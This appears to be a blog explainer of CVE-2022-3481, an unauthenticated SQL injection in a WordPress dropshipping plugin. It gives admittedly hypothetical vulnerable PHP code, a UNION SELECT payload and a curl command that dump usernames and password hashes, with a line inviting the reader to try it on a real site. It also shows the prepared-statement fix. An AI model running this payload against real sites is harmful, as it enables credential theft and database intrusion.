CVE-2022-3481 - Unauthenticated SQL Injection in WooCommerce Dropshipping Plugin (WordPress, < 4.4)

The world of WordPress plugins is vast, but sometimes even popular plugins contain severe security flaws. One such flaw—CVE-2022-3481—was discovered in the WooCommerce Dropshipping plugin before version 4.4. This vulnerability allows attackers to exploit a REST API endpoint, injecting malicious SQL code, *even when not logged in*. Let's break it down in simple terms so everyone can understand:

How Did This Vulnerability Happen?

The plugin offered a REST API endpoint for certain dropshipping operations. Unfortunately, it failed to properly sanitize (clean up) and escape (make safe for use) an input parameter used in a SQL query. That means a malicious user could send crafted input and have their SQL commands run directly on the database—this could mean stealing data, modifying site content, or even gaining full access.

Here’s a simplified, *exclusive* example of what the vulnerable code might have looked like

// Example code illustrating the problem
global $wpdb;
$order_id = $_GET['order_id']; // Value from user, NOT sanitized
$query = "SELECT * FROM {$wpdb->prefix}orders WHERE id = $order_id";
$results = $wpdb->get_results($query);

In this example, $_GET['order_id'] comes *directly* from the HTTP request, possibly from an unauthenticated visitor, and is used *unfiltered* in a SQL query. An attacker could send something like:

/wp-json/dropshipping/v1/order?order_id= UNION SELECT user_login,user_pass FROM wp_users--

Their SQL gets injected right into the query, which could let them retrieve usernames and hashed passwords.

Real-World Exploitation

Exploiting CVE-2022-3481 is as simple as sending a specially crafted HTTP request. Here’s an example using curl from the command line:

curl "https://victim.com/wp-json/dropshipping/v1/order?order_id=%20UNION%20SELECT%20user_login,user_pass%20FROM%20wp_users--";

Replace victim.com with a real site and watch as the WordPress database coughs up sensitive data in the response.

Patch & Mitigations

This vulnerability was fixed in version 4.4. If your site has an older version, *update NOW* from the plugin’s WordPress page!

Developers fixed the issue by using prepared statements and safe parameter handling, like this

// SAFE: Using $wpdb->prepare
$order_id = intval($_GET['order_id']);
$query = $wpdb->prepare(
    "SELECT * FROM {$wpdb->prefix}orders WHERE id = %d",
    $order_id
);
$results = $wpdb->get_results($query);

With this pattern, no matter what input a user sends, it’s properly escaped, and attackers’ SQL code won’t run.

Original References & Further Reading

- NVD CVE-2022-3481 details
- Wordfence Advisory
- Plugin homepage
- Read about SQL Injection basics (OWASP)

Conclusion

CVE-2022-3481 is a textbook example of why developers must *always* sanitize and escape input, and why site owners need to keep their plugins up to date. An unauthenticated attacker could break into your WordPress database *without needing to log in* thanks to one unprotected line of code.

If you have WooCommerce Dropshipping < 4.4 installed—patch it now! Don’t be an easy target.


*Got questions? Want to see example exploit code or need help securing your WordPress? Drop a comment below!*

Timeline

Published on: 11/07/2022 10:15:00 UTC
Last modified on: 12/20/2022 19:16:00 UTC